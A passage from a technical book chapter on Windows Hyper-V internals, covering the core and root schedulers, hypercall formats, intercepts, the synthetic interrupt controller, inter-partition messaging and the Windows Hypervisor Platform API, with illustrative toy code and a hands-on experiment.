and does not appear on any run list. (In Figure 9-13, this is the situation for VP group D.) The only VP of
group E has recently left the idle state and has been assigned to CPU core 2. In the figure,
a dummy sibling VP is shown. This is because an LP of core 2 never schedules any other VP while its
sibling LP is executing a VP belonging to VM 3. In the same way, no other VPs are scheduled
on a physical core if one VP in the LP group becomes idle while the other is still executing (such as for
group A, for example). Each core executes the VP group that is at the head of its run list. If there are no
VP groups to execute, the core becomes idle and waits for a VP group to be deposited onto its deferred
run list. When this occurs, the core wakes up from idle and empties its deferred run list, placing the
contents onto its run list.
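The invariant described above can be captured in a toy model: a core's run list holds VP groups rather than individual VPs, and both sibling LPs of a core only ever run VPs from the same group, with a dummy filling the sibling LP for a single-VP group. The class and naming below are invented for illustration.

```python
# Toy model of the core scheduler invariant: both SMT LPs of a physical
# core run VPs from the same group (same VM); a dummy VP fills the
# sibling LP when a group has a single runnable VP. Purely illustrative.

from collections import deque

class Core:
    def __init__(self):
        self.run_list = deque()    # groups of (vm, [vps]) ready to run

    def schedule(self):
        """Dispatch the group at the head of the run list onto both LPs."""
        if not self.run_list:
            return ("idle", "idle")
        vm, vps = self.run_list.popleft()
        lp0 = f"{vm}:{vps[0]}"
        lp1 = f"{vm}:{vps[1]}" if len(vps) > 1 else f"{vm}:dummy"
        return (lp0, lp1)

core = Core()
core.run_list.append(("VM1", ["VP0", "VP1"]))
core.run_list.append(("VM3", ["VP0"]))          # a single-VP group, like group E
print(core.schedule())  # ('VM1:VP0', 'VM1:VP1')
print(core.schedule())  # ('VM3:VP0', 'VM3:dummy')
```

The dummy slot is what guarantees that the sibling LP never runs a VP from a different VM, which is exactly the security boundary the core scheduler provides.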
The core scheduler is implemented by different components (see Figure 9-14) that provide strict
layering between each other. The heart of the core scheduler is the scheduling unit, which represents a
virtual core or group of SMT VPs. (For non-SMT VMs, it represents a single VP.) Depending on the VM’s
type, the scheduling unit has either one or two threads bound to it. The hypervisor’s process owns a list
of scheduling units, which own the threads backing the VPs belonging to the VM. The scheduling unit is
the single unit of scheduling for the core scheduler to which scheduling settings—such as reservation,
weight, and cap—are applied during runtime. A scheduling unit stays active for the duration of a time
slice, can be blocked and unblocked, and can migrate between different physical processor cores. An
important concept is that the scheduling unit is analogous to a thread in the classic scheduler, but it
doesn’t have a stack or VP context in which to run. It’s one of the threads bound to a scheduling unit
that runs on a physical processor core. The thread gang scheduler is the arbiter for each scheduling unit.
It’s the entity that decides which thread from the active scheduling unit gets run by which LP from the
physical processor core. It enforces thread affinities, applies thread scheduling policies, and updates
the related counters for each thread.
[Figure 9-14 depicts the layering: the scheduler manager (exposing the scheduler service) sits above the per-core unit schedulers; each unit scheduler is bound to a core dispatcher (tracked through a CPU_PLS structure), which owns the logical processor dispatchers and the thread gang scheduler; the scheduling units, each backed by TH_THREAD objects of a TH_PROCESS, are the entities being dispatched.]
FIGURE 9-14 The components of the core scheduler.
Each LP of the physical processor’s core has an instance of a logical processor dispatcher associated
with it. The logical processor dispatcher is responsible for switching threads, maintaining timers, and
flushing the VMCS (or VMCB, depending on the architecture) for the current thread. Logical processor dispatchers are owned by the core dispatcher, which represents a single physical processor core and owns exactly two SMT LPs. The core dispatcher manages the current (active) scheduling unit. The
unit scheduler, which is bound to its own core dispatcher, decides which scheduling unit needs to run
next on the physical processor core the unit scheduler belongs to. The last important component of
the core scheduler is the scheduler manager, which owns all the unit schedulers in the system and has
a global view of all their states. It provides load balancing and ideal core assignment services to the
unit scheduler.
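The strict layering just described can be summarized with a set of illustrative C structs. The real hypervisor types are opaque and differ; these merely encode the ownership relationships in the text:

```c
#include <assert.h>

/* Illustrative mirror of the core scheduler's layering (Figure 9-14). */
typedef struct thread thread;       /* backs one VP (TH_THREAD) */

typedef struct scheduling_unit {
    thread *threads[2];             /* one or two SMT threads bound */
    int nthreads;
    int reservation, weight, cap;   /* per-unit scheduling settings */
} scheduling_unit;

typedef struct lp_dispatcher {      /* one per SMT logical processor */
    thread *current;
} lp_dispatcher;

typedef struct core_dispatcher {    /* one physical core, two SMT LPs */
    lp_dispatcher lp[2];
    scheduling_unit *active;        /* current (active) scheduling unit */
} core_dispatcher;

typedef struct unit_scheduler {     /* picks the next unit for its core */
    core_dispatcher *core;
} unit_scheduler;

typedef struct scheduler_manager {  /* global view, load balancing */
    unit_scheduler *units;
    int nunits;
} scheduler_manager;

/* An SMT unit carries two threads; a non-SMT unit carries one. */
int unit_is_smt(const scheduling_unit *u) { return u->nthreads == 2; }
```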
The root scheduler
The root scheduler (also known as integrated scheduler) was introduced in Windows 10 April 2018
Update (RS4) with the goal of allowing the root partition to schedule virtual processors (VPs) belonging to guest partitions. The root scheduler was designed to support lightweight containers
used by Windows Defender Application Guard. Those types of containers (internally called Barcelona
or Krypton containers) must be managed by the root partition and should consume a small amount of
memory and hard-disk space. (Describing Krypton containers in depth is outside the scope of this book. You can find an introduction to server containers in Part 1, Chapter 3, “Processes and jobs.”) In addition,
the root OS scheduler can readily gather metrics about workload CPU utilization inside the container
and use this data as input to the same scheduling policy applicable to all other workloads in the system.
The NT scheduler in the root partition’s OS instance manages all aspects of scheduling work to
system LPs. To achieve that, the integrated scheduler’s root component inside the VID driver creates
a VP-dispatch thread inside of the root partition (in the context of the new VMMEM process) for each
guest VP. (VA-backed VMs are discussed later in this chapter.) The NT scheduler in the root partition
schedules VP-dispatch threads as regular threads subject to additional VM/VP-specific scheduling poli-
cies and enlightenments. Each VP-dispatch thread runs a VP-dispatch loop until the VID driver termi-
nates the corresponding VP.
The VP-dispatch thread is created by the VID driver after the VM Worker Process (VMWP), which is
covered in the “Virtualization stack” section later in this chapter, has requested the creation of the partition and its VPs through the SETUP_PARTITION IOCTL. The VID driver communicates with the WinHvr driver,
which in turn initializes the hypervisor’s guest partition creation (through the HvCreatePartition hyper-
call). In case the created partition represents a VA-backed VM, or in case the system has the root sched-
uler active, the VID driver calls into the NT kernel (through a kernel extension) with the goal to create
the VMMEM minimal process associated with the new guest partition. The VID driver also creates a VP-
dispatch thread for each VP belonging to the partition. The VP-dispatch thread executes in the context
of the VMMEM process in kernel mode (no user mode code exists in VMMEM) and is implemented in
the VID driver (and WinHvr). As shown in Figure 9-15, each VP-dispatch thread runs a VP-dispatch loop
until the VID terminates the corresponding VP or an intercept is generated from the guest partition.
[Figure 9-15 depicts the flow: VidVpRun signals the ThreadWork event; the VP-dispatch thread (run by the VID driver in the VMMEM process context) wakes, runs the root scheduler dispatch loop, and sends HvDispatchVp to the hypervisor using the WinHvr driver; on return it processes the intercept, and if the intercept requires user-mode processing, it wakes the VmWp worker thread and waits for the DispatchDone event, which the worker signals after calling into the VID to get a message; once the intercept is completed, the loop restarts, and on VP termination the thread completes the IOCTL and exits to VmWp.]
FIGURE 9-15 The root scheduler’s VP-dispatch thread and the associated VMWP worker thread that processes the hypervisor’s messages.
While in the VP-dispatch loop, the VP-dispatch thread is responsible for the following:
1. Call the hypervisor’s new HvDispatchVp hypercall interface to dispatch the VP on the current processor. On each HvDispatchVp hypercall, the hypervisor tries to switch context from the current root VP to the specified guest VP and let it run the guest code. One of the most important characteristics of this hypercall is that the code that emits it should run at PASSIVE_LEVEL IRQL. The hypervisor lets the guest VP run until either the VP blocks voluntarily, the VP generates an intercept for the root, or there is an interrupt targeting the root VP. Clock interrupts are still processed by the root partition. When the guest VP exhausts its allocated time slice, the VP-backing thread is preempted by the NT scheduler. On any of the three events, the hypervisor switches back to the root VP and completes the HvDispatchVp hypercall. It then returns to the root partition.
2. Block on the VP-dispatch event if the corresponding VP in the hypervisor is blocked. Anytime the guest VP is blocked voluntarily, the VP-dispatch thread blocks itself on a VP-dispatch event until the hypervisor unblocks the corresponding guest VP and notifies the VID driver. The VID driver signals the VP-dispatch event, and the NT scheduler unblocks the VP-dispatch thread, which can make another HvDispatchVp hypercall.
3. Process all intercepts reported by the hypervisor on return from the dispatch hypercall. If the guest VP generates an intercept for the root, the VP-dispatch thread processes the intercept request on return from the HvDispatchVp hypercall and makes another HvDispatchVp request after the VID completes processing of the intercept. Each intercept is managed differently. If the intercept requires processing from the user-mode VMWP process, the WinHvr driver exits the loop and returns to the VID, which signals an event for the backing VMWP thread and waits for the intercept message to be processed by the VMWP process before restarting the loop.
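Putting the three responsibilities together, the dispatch loop can be modeled as a small C simulation. The scripted hv_dispatch_vp stand-in and the event names are hypothetical; only the control flow follows the text:

```c
#include <assert.h>

/* Scripted stand-in for the guest VP: each simulated HvDispatchVp
 * "hypercall" consumes the next event the guest produces. */
enum ev { EV_BLOCK, EV_INTERCEPT, EV_TERMINATE };

typedef struct { const enum ev *script; int pos; } vp_sim;

static enum ev hv_dispatch_vp(vp_sim *vp) { return vp->script[vp->pos++]; }

/* The VP-dispatch loop: dispatch the VP, then handle whichever of the
 * three outcomes ended the dispatch, until the VP is terminated. */
int vp_dispatch_loop(vp_sim *vp, int *blocks, int *intercepts)
{
    int dispatches = 0;
    for (;;) {
        enum ev e = hv_dispatch_vp(vp);  /* runs at PASSIVE_LEVEL IRQL */
        dispatches++;
        if (e == EV_TERMINATE)
            break;                        /* VID terminated the VP */
        if (e == EV_BLOCK)
            (*blocks)++;                  /* wait on the VP-dispatch event */
        else
            (*intercepts)++;              /* process intercept, redispatch */
    }
    return dispatches;
}
```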
To properly deliver signals to VP-dispatch threads from the hypervisor to the root, the integrated
scheduler provides a scheduler message exchange mechanism. The hypervisor sends scheduler mes-
sages to the root partition via a shared page. When a new message is ready for delivery, the hypervisor
injects a SINT interrupt into the root, and the root delivers it to the corresponding ISR handler in the
WinHvr driver, which routes the message to the VID intercept callback (VidInterceptIsrCallback). The
intercept callback tries to handle the intercept message directly from the VID driver. In case the direct
handling is not possible, a synchronization event is signaled, which allows the dispatch loop to exit and
allows one of the VmWp worker threads to dispatch the intercept in user mode.
Context switches when the root scheduler is enabled are more expensive compared to other hyper-
visor scheduler implementations. When the system switches between two guest VPs, for example, it
always needs to generate two exits to the root partition. The integrated scheduler treats the hypervisor’s
root VP threads and guest VP threads very differently (they are internally represented by the same
TH_THREAD data structure, though):
■ Only the root VP thread can enqueue a guest VP thread to its physical processor. The root VP thread has priority over any guest VP that is running or being dispatched. If the root VP is not blocked, the integrated scheduler tries its best to switch the context to the root VP thread as soon as possible.
■ A guest VP thread has two sets of states: thread internal states and thread root states. The thread root states reflect the states of the VP-dispatch thread that the hypervisor communicates to the root partition. The integrated scheduler maintains those states for each guest VP thread to know when to send a wake-up signal for the corresponding VP-dispatch thread to the root.
Only the root VP can initiate a dispatch of a guest VP for its processor. It can do that either because
of HvDispatchVp hypercalls (in this situation, we say that the hypervisor is processing “external work”),
or because of any other hypercall that requires sending a synchronous request to the target guest VP
(this is what is defined as “internal work”). If the guest VP last ran on the current physical processor, the
scheduler can dispatch the guest VP thread right away. Otherwise, the scheduler needs to send a flush
request to the processor on which the guest VP last ran and wait for the remote processor to flush the
VP context. The latter case is defined as “migration” and is a situation that the hypervisor needs to track
(through the thread internal states and root states, which are not described here).
EXPERIMENT: Playing with the root scheduler
The NT scheduler decides when to select and run a virtual processor belonging to a VM and for
how long. This experiment demonstrates what we have discussed previously: All the VP dis-
patch threads execute in the context of the VMMEM process, created by the VID driver. For the
experiment, you need a workstation with at least Windows 10 April 2018 update (RS4) installed,
along with the Hyper-V role enabled and a VM with any operating system installed ready for use.
The procedure for creating a VM is explained in detail here: https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/quick-create-virtual-machine.
First, you should verify that the root scheduler is enabled. Details on the procedure are avail-
able in the “Controlling the hypervisor’s scheduler type” experiment earlier in this chapter. The
VM used for testing should be powered down.
Open the Task Manager by right-clicking on the task bar and selecting Task Manager, click the
Details sheet, and verify how many VMMEM processes are currently active. If no VMs are running, there should be none; if the Windows Defender Application Guard (WDAG)
role is installed, there could be an existing VMMEM process instance, which hosts the preloaded
WDAG container. (This kind of VM is described later in the “VA-backed virtual machines” section.) In
case a VMMEM process instance exists, you should take note of its process ID (PID).
Open the Hyper-V Manager by typing Hyper-V Manager in the Cortana search box and start
your virtual machine. After the VM has been started and the guest operating system has success-
fully booted, switch back to the Task Manager and search for a new VMMEM process. If you click
the new VMMEM process and expand the User Name column, you can see that the process has
been associated with a token owned by a user named as the VM’s GUID. You can obtain your VM’s
GUID by executing the following command in an administrative PowerShell window (replace the
term “<VmName>” with the name of your VM):
Get-VM -VmName "<VmName>" | ft VMName, VmId
The VM ID and the VMMEM process’s user name should be the same, as shown in the follow-
ing figure.
Install Process Explorer (by downloading it from https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer), and run it as administrator. Search for the PID of the correct VMMEM process identified in the previous step (27312 in the example), right-click it, and select “Suspend”. The CPU tab of the VMMEM process should now show “Suspended” instead of the correct CPU time.
If you switch back to the VM, you will find that it is unresponsive and completely stuck. This is
because you have suspended the process hosting the dispatch threads of all the virtual proces-
sors belonging to the VM. This prevented the NT kernel from scheduling those threads, which
won’t allow the WinHvr driver to emit the needed HvDispatchVp hypercall used to resume the
VP execution.
If you right-click the suspended VMMEM and select Resume, your VM resumes its execution
and continues to run correctly.
Hypercalls and the hypervisor TLFS
Hypercalls provide a mechanism for the operating system running in the root or in a child partition to request services from the hypervisor. Hypercalls have a well-defined set of input and output
parameters. The hypervisor Top Level Functional Specification (TLFS) is available online (https://docs
.microsoft.com/en-us/virtualization/hyper-v-on-windows/reference/tlfs); it defines the different call-
ing conventions used while specifying those parameters. Furthermore, it lists all the publicly available
hypervisor features, partition properties, and hypervisor and VSM interfaces.
Hypercalls are available because of a platform-dependent opcode (VMCALL for Intel systems,
VMMCALL for AMD, HVC for ARM64) which, when invoked, always causes a VM_EXIT into the hypervisor. VM_EXITs are events that suspend the VP and make the hypervisor resume executing its own code at the hypervisor privilege level, which is higher than that of any other software running in the system (except for the firmware’s SMM context). VM_EXIT events can be generated for various reasons. In
the platform-specific VMCS (or VMCB) opaque data structure the hardware maintains an index that
specifies the exit reason for the VM_EXIT. The hypervisor gets the index, and, in case of an exit caused
by a hypercall, reads the hypercall input value specified by the caller (generally from a CPU’s general-
purpose register—RCX in the case of 64-bit Intel and AMD systems). The hypercall input value (see
Figure 9-16) is a 64-bit value that specifies the hypercall code, its properties, and the calling convention
used for the hypercall. Three kinds of calling conventions are available:
■ Standard hypercalls Store the input and output parameters on 8-byte aligned guest physical addresses (GPAs). The OS passes the two addresses via general-purpose registers (RDX and R8 on Intel and AMD 64-bit systems).
■ Fast hypercalls Usually don’t allow output parameters and employ the two general-purpose registers used in standard hypercalls to pass only input parameters to the hypervisor (up to 16 bytes in size).
■ Extended fast hypercalls (or XMM fast hypercalls) Similar to fast hypercalls, but these use an additional six floating-point registers to allow the caller to pass input parameters up to 112 bytes in size.
Bits 63:60  RsvdZ (4 bits)
Bits 59:48  Rep start index (12 bits)
Bits 47:44  RsvdZ (4 bits)
Bits 43:32  Rep count (12 bits)
Bits 31:27  RsvdZ (5 bits)
Bits 26:17  Variable header size (9 bits)
Bit  16     Fast (1 bit)
Bits 15:0   Call code (16 bits)

FIGURE 9-16 The hypercall input value (from the hypervisor TLFS).
There are two classes of hypercalls: simple and rep (which stands for “repeat”). A simple hypercall
performs a single operation and has a fixed-size set of input and output parameters. A rep hypercall
acts like a series of simple hypercalls. When a caller initially invokes a rep hypercall, it specifies a rep
count that indicates the number of elements in the input or output parameter list. Callers also specify
a rep start index that indicates the next input or output element that should be consumed.
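Based on the layout in Figure 9-16, a hypercall input value could be packed as follows. This is a sketch for illustration; the TLFS remains the authoritative reference for the field definitions:

```c
#include <assert.h>
#include <stdint.h>

/* Pack a hypercall input value using the field positions of Figure 9-16. */
uint64_t hv_input_value(uint16_t call_code, int fast,
                        unsigned var_hdr_size, unsigned rep_count,
                        unsigned rep_start_index)
{
    uint64_t v = 0;
    v |= (uint64_t)call_code;                       /* bits 15:0  */
    v |= (uint64_t)(fast & 1) << 16;                /* bit  16    */
    v |= (uint64_t)(var_hdr_size & 0x3FF) << 17;    /* bits 26:17 */
    v |= (uint64_t)(rep_count & 0xFFF) << 32;       /* bits 43:32 */
    v |= (uint64_t)(rep_start_index & 0xFFF) << 48; /* bits 59:48 */
    return v;                                       /* RsvdZ bits stay zero */
}
```

For a rep hypercall, the caller fills in the rep count once and updates the rep start index each time the call is re-executed.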
All hypercalls return another 64-bit value called hypercall result value (see Figure 9-17). Generally,
the result value describes the operation’s outcome and, for rep hypercalls, the total number of completed repetitions.
Bits 63:44  Rsvd (20 bits)
Bits 43:32  Rep complete (12 bits)
Bits 31:16  Rsvd (16 bits)
Bits 15:0   Result (16 bits)

FIGURE 9-17 The hypercall result value (from the hypervisor TLFS).
Hypercalls can take some time to complete. Keeping a physical CPU busy in a state where it doesn’t receive interrupts can be dangerous for the host OS. For example, Windows has a mechanism that detects
whether a CPU has not received its clock tick interrupt for a period of time longer than 16 milliseconds.
If this condition is detected, the system is suddenly stopped with a BSOD. The hypervisor therefore
relies on a hypercall continuation mechanism for some hypercalls, including all rep hypercall forms. If
a hypercall isn’t able to complete within the prescribed time limit (usually 50 microseconds), control is
returned back to the caller (through an operation called VM_ENTRY), but the instruction pointer is not
advanced past the instruction that invoked the hypercall. This allows pending interrupts to be handled
and other virtual processors to be scheduled. When the original calling thread resumes execution, it
will re-execute the hypercall instruction and make forward progress toward completing the operation.
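The continuation mechanism can be illustrated with a small simulation in which each invocation completes at most a fixed number of repetitions before its time slice "expires," and the caller re-executes the hypercall, resuming from the reported rep complete count. The helper names are invented:

```c
#include <assert.h>
#include <stdint.h>

/* Field extractors for the hypercall result value (Figure 9-17). */
static unsigned hv_result_code(uint64_t r)  { return (unsigned)(r & 0xFFFF); }
static unsigned hv_rep_complete(uint64_t r) { return (unsigned)((r >> 32) & 0xFFF); }

/* Stand-in hypercall: completes at most `budget` repetitions per
 * invocation before its time slice runs out. */
static uint64_t sim_rep_hypercall(unsigned start, unsigned count, unsigned budget)
{
    unsigned done = count - start;
    if (done > budget)
        done = budget;                     /* time limit hit */
    return (uint64_t)(start + done) << 32; /* rep complete; result 0 */
}

/* Caller side: the hypercall instruction is "re-executed" until every
 * repetition is complete; returns how many invocations were needed. */
unsigned run_rep_hypercall(unsigned rep_count, unsigned budget)
{
    unsigned start = 0, calls = 0;
    while (start < rep_count) {
        uint64_t r = sim_rep_hypercall(start, rep_count, budget);
        assert(hv_result_code(r) == 0);    /* success */
        start = hv_rep_complete(r);        /* resume from next element */
        calls++;
    }
    return calls;
}
```

Between invocations, pending interrupts can be handled and other VPs scheduled, exactly because the instruction pointer was not advanced.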
A driver usually never emits a hypercall directly through the platform-dependent opcode.
Instead, it uses services exposed by the Windows hypervisor interface driver, which is available in
two different versions:
■ WinHvr.sys Loaded at system startup if the OS is running in the root partition and exposes hypercalls available in both the root and child partition.
■ WinHv.sys Loaded only when the OS is running in a child partition. It exposes hypercalls available in the child partition only.
Routines and data structures exported by the Windows hypervisor interface driver are extensively
used by the virtualization stack, especially by the VID driver, which, as we have already introduced,
covers a key role in the functionality of the entire Hyper-V platform.
Intercepts
The root partition should be able to create a virtual environment that allows an unmodified guest OS,
which was written to execute on physical hardware, to run in a hypervisor’s guest partition. Such legacy
guests may attempt to access physical devices that do not exist in a hypervisor partition (for example,
by accessing certain I/O ports or by writing to specific MSRs). For these cases, the hypervisor provides
the host intercepts facility; when a VP of a guest VM executes certain instructions or generates certain
exceptions, the authorized root partition can intercept the event and alter the effect of the intercepted
instruction such that, to the child, it mirrors the expected behavior in physical hardware.
When an intercept event occurs in a child partition, its VP is suspended, and an intercept message
is sent to the root partition by the Synthetic Interrupt Controller (SynIC; see the following section
for more details) from the hypervisor. The message is received thanks to the hypervisor’s Synthetic
ISR (Interrupt Service Routine), which the NT kernel installs during phase 0 of its startup only if the system is enlightened and running under the hypervisor (see Chapter 12 for more details). The
hypervisor synthetic ISR (KiHvInterrupt), usually installed on vector 0x30, transfers its execution
to an external callback, which the VID driver has registered when it started (through the exposed
HvlRegisterInterruptCallback NT kernel API).
The VID driver is an intercept driver, meaning that it is able to register host intercepts with the
hypervisor and thus receives all the intercept events that occur on child partitions. After the partition
is initialized, the VM Worker Process registers intercepts for various components of the virtualization stack. (For example, the virtual motherboard registers I/O intercepts for each virtual COM port of the
VM.) It sends an IOCTL to the VID driver, which uses the HvInstallIntercept hypercall to install the inter-
cept on the child partition. When the child partition raises an intercept, the hypervisor suspends the VP
and injects a synthetic interrupt in the root partition, which is managed by the KiHvInterrupt ISR. The
latter routine transfers the execution to the registered VID Intercept callback, which manages the event
and restarts the VP by clearing the intercept suspend synthetic register of the suspended VP.
The hypervisor supports the interception of the following events in the child partition:
■ Access to I/O ports (read or write)
■ Access to VP’s MSRs (read or write)
■ Execution of the CPUID instruction
■ Exceptions
■ Accesses to general-purpose registers
■ Hypercalls
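A minimal model of intercept registration and delivery might look like the following. The function names are illustrative stand-ins for the HvInstallIntercept/VID-callback flow, not real APIs:

```c
#include <assert.h>
#include <stddef.h>

/* Event classes the hypervisor can intercept for a child partition,
 * plus a toy registration/delivery path. */
enum intercept_type {
    INTERCEPT_IO_PORT, INTERCEPT_MSR, INTERCEPT_CPUID,
    INTERCEPT_EXCEPTION, INTERCEPT_GP_REGISTER, INTERCEPT_HYPERCALL,
    INTERCEPT_TYPE_COUNT
};

typedef int (*intercept_handler)(unsigned detail);

static intercept_handler handlers[INTERCEPT_TYPE_COUNT];

/* Analogous to sending the IOCTL that ends in HvInstallIntercept. */
void install_intercept(enum intercept_type t, intercept_handler h)
{
    handlers[t] = h;
}

/* Analogous to the VID intercept callback: returns 1 if the event was
 * handled, so the suspended VP can be restarted. */
int deliver_intercept(enum intercept_type t, unsigned detail)
{
    return handlers[t] ? handlers[t](detail) : 0;
}

/* Sample handler: a virtual COM-port I/O intercept for port 0x3F8. */
static int com_port_handler(unsigned port) { return port == 0x3F8; }
```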
The synthetic interrupt controller (SynIC)
The hypervisor virtualizes interrupts and exceptions for both the root and guest partitions through
the synthetic interrupt controller (SynIC), which is an extension of a virtualized local APIC (see the Intel
or AMD software developer manual for more details about the APIC). The SynIC is responsible for
dispatching virtual interrupts to virtual processors (VPs). Interrupts delivered to a partition fall into two
categories: external and synthetic (also known as internal or simply virtual interrupts). External inter-
rupts originate from other partitions or devices; synthetic interrupts are originated from the hypervisor
itself and are targeted to a partition’s VP.
When a VP in a partition is created, the hypervisor creates and initializes a SynIC for each supported
VTL. It then starts the VTL 0’s SynIC, which means that it enables the virtualization of a physical CPU’s
APIC in the VMCS (or VMCB) hardware data structure. The hypervisor supports three kinds of APIC
virtualization while dealing with external hardware interrupts:
■ In the standard configuration, the APIC is virtualized through the event injection hardware support. This means that every time a partition accesses the VP’s local APIC registers, I/O ports, or MSRs (in the case of x2APIC), it produces a VMEXIT, causing hypervisor code to dispatch the interrupt through the SynIC, which eventually “injects” an event to the correct guest VP by manipulating VMCS/VMCB opaque fields (after it goes through logic similar to a physical APIC’s, which determines whether the interrupt can be delivered).
■ The APIC emulation mode works similarly to the standard configuration. Every physical interrupt sent by the hardware (usually through the IOAPIC) still causes a VMEXIT, but the hypervisor does not have to inject any event. Instead, it manipulates a virtual-APIC page used by the processor to virtualize certain accesses to the APIC registers. When the hypervisor wants to inject an event, it simply manipulates some virtual registers mapped in the virtual-APIC page. The event is delivered by the hardware when a VMENTRY happens. At the same time, if a guest VP manipulates certain parts of its local APIC, it does not produce any VMEXIT, but the modification will be stored in the virtual-APIC page.
■ Posted interrupts allow certain kinds of external interrupts to be delivered directly in the guest partition without producing any VMEXIT. This allows direct-access devices to be mapped directly in the child partition without incurring any performance penalties caused by VMEXITs. The physical processor processes the virtual interrupts by directly recording them as pending on the virtual-APIC page. (For more details, consult the Intel or AMD software developer manual.)
When the hypervisor starts a processor, it usually initializes the synthetic interrupt controller module
for the physical processor (represented by a CPU_PLS data structure). The SynIC module of the physical
processor is an array of interrupt descriptors, which make the connection between a physical interrupt and a virtual interrupt. A hypervisor interrupt descriptor (IDT entry), as shown in Figure 9-18, contains
the data needed for the SynIC to correctly dispatch the interrupt, in particular the entity the interrupt is
delivered to (a partition, the hypervisor, a spurious interrupt), the target VP (root, a child, multiple VPs, or
a synthetic interrupt), the interrupt vector, the target VTL, and some other interrupt characteristics.
[Figure 9-18 depicts the fields of the descriptor: the dispatch type, the target VP and VTL, the virtual vector, the interrupt characteristics, and a hypervisor-reserved field.]
FIGURE 9-18 The hypervisor physical interrupt descriptor.
In default configurations, all the interrupts are delivered to the root partition in VTL 0 or to the
hypervisor itself (in the second case, the interrupt entry is Hypervisor Reserved). External interrupts
can be delivered to a guest partition only when a direct access device is mapped into a child partition;
NVMe devices are a good example.
Every time the thread backing a VP is selected for being executed, the hypervisor checks whether
one (or more) synthetic interrupt needs to be delivered. As discussed previously, synthetic interrupts
aren’t generated by any hardware; they’re usually generated from the hypervisor itself (under certain
conditions), and they are still managed by the SynIC, which is able to inject the virtual interrupt to the
correct VP. Even though they’re extensively used by the NT kernel (the enlightened clock timer is a
good example), synthetic interrupts are fundamental for the Virtual Secure Mode (VSM). We discuss them in the section “The Secure Kernel” later in this chapter.
The root partition can send a customized virtual interrupt to a child by using the HvAssertVirtualInterrupt
hypercall (documented in the TLFS).
Inter-partition communication
The synthetic interrupt controller also has the important role of providing inter-partition communica-
tion facilities to the virtual machines. The hypervisor provides two principal mechanisms for one parti-
tion to communicate with another: messages and events. In both cases, the notifications are sent to the
target VP using synthetic interrupts. Messages and events are sent from a source partition to a target
partition through a preallocated connection, which is associated with a destination port.
One of the most important components that uses the inter-partition communication services pro-
vided by the SynIC is VMBus. (VMBus architecture is discussed in the “Virtualization stack” section later
in this chapter.) The VMBus root driver (Vmbusr.sys) in the root allocates a port ID (ports are identified
by a 32-bit ID) and creates a port in the child partition by emitting the HvCreatePort hypercall through
the services provided by the WinHv driver.
A port is allocated in the hypervisor from the receiver’s memory pool. When a port is created, the
hypervisor allocates sixteen message buffers from the port memory. The message buffers are main-
tained in a queue associated with a SINT (synthetic interrupt source) in the virtual processor’s SynIC.
The hypervisor exposes sixteen interrupt sources, which can allow the VMBus root driver to manage a
maximum of 16 message queues. A synthetic message has the fixed size of 256 bytes and can transfer
only 240 bytes (16 bytes are used as header). The caller of the HvCreatePort hypercall specifies which
virtual processor and SINT to target.
To correctly receive messages, the WinHv driver allocates a synthetic interrupt message page
(SIMP), which is then shared with the hypervisor. When a message is enqueued for a target partition,
the hypervisor copies the message from its internal queue to the SIMP slot corresponding to the cor-
rect SINT. The VMBus root driver then creates a connection, which associates the port opened in the
child VM to the parent, through the HvConnectPort hypercall. After the child has enabled the recep-
tion of synthetic interrupts in the correct SINT slot, the communication can start; the sender can post
a message to the client by specifying a target Port ID and emitting the HvPostMessage hypercall. The
hypervisor injects a synthetic interrupt to the target VP, which can read from the message page (SIMP)
the content of the message.
CHAPTER 9 Virtualization technologies
The hypervisor supports ports and connections of three types:
- Message ports: Transmit 240-byte messages from and to a partition. A message port is associated with a single SINT in the parent and child partition. Messages will be delivered in order through a single port message queue. This characteristic makes messages ideal for VMBus channel setup and teardown (further details are provided in the "Virtualization stack" section later in this chapter).
- Event ports: Receive simple interrupts associated with a set of flags, set by the hypervisor when the opposite endpoint makes a HvSignalEvent hypercall. This kind of port is normally used as a synchronization mechanism. VMBus, for example, uses an event port to notify that a message has been posted on the ring buffer described by a particular channel. When the event interrupt is delivered to the target partition, the receiver knows exactly which channel the interrupt targets thanks to the flag associated with the event.
- Monitor ports: An optimization to the Event port. Causing a VMEXIT and a VM context switch for every single HvSignalEvent hypercall is an expensive operation. Monitor ports are set up by allocating a shared page (between the hypervisor and the partition) that contains a data structure indicating which event port is associated with a particular monitored notification flag (a bit in the page). In that way, when the source partition wants to send a synchronization interrupt, it can just set the corresponding flag in the shared page. Sooner or later the hypervisor will notice the bit set in the shared page and will trigger an interrupt to the event port.
The Windows hypervisor platform API and EXO partitions
Windows increasingly uses Hyper-V’s hypervisor for providing functionality not only related to running
traditional VMs. In particular, as we will discuss in the second part of this chapter, VSM, an important
security component of modern Windows versions, leverages the hypervisor to enforce a higher
level of isolation for features that provide critical system services or handle secrets such as passwords.
Enabling these features requires that the hypervisor is running by default on a machine.
External virtualization products, like VMware, QEMU, VirtualBox, the Android Emulator, and many
others, use the virtualization extensions provided by the hardware to build their own hypervisors,
which they need in order to run correctly. This is clearly not compatible with Hyper-V, which launches
its hypervisor before the Windows kernel starts up in the root partition (the Windows hypervisor is a
native, or bare-metal, hypervisor).
As with Hyper-V, external virtualization solutions are also composed of a hypervisor, which provides
generic low-level abstractions for the processor's execution and memory management of the VM, and a
virtualization stack, which refers to the components of the virtualization solution that provide the emulated
environment for the VM (like its motherboard, firmware, storage controllers, devices, and so on).
The Windows Hypervisor Platform API, which is documented at https://docs.microsoft.com/en-us/virtualization/api/,
has the main goal of enabling third-party virtualization solutions to run on the
Windows hypervisor. Specifically, a third-party virtualization product should be able to create, delete,
start, and stop VMs with characteristics (firmware, emulated devices, storage controllers) defined by its
own virtualization stack. The third-party virtualization stack, with its management interfaces, continues
to run on Windows in the root partition, which allows its clients to keep using their VMs unchanged.
As shown in Figure 9-19, all the Windows hypervisor platform's APIs run in user mode and are
implemented on top of the VID and WinHvr drivers in two libraries: WinHvPlatform.dll and
WinHvEmulation.dll (the latter implements the instruction emulator for MMIO).
[Figure omitted: the virtualization stack process in the root partition calls the Windows Hypervisor Platform API (WinHvPlatform.dll plus the hypervisor instruction emulator), which sits on top of the VID driver (MicroVm) and the WinHvr driver in the kernel; the VID driver maps the guest partition's GPA space, whose VPs are run by the hypervisor. Labels include WHvRunVirtualProcessor, WHvMapGpaRange, CreateThread, VirtualAlloc, and MapViewOfFile.]
FIGURE 9-19 The Windows hypervisor platform API architecture.
A user mode application that wants to create a VM and its relative virtual processors usually should
do the following:
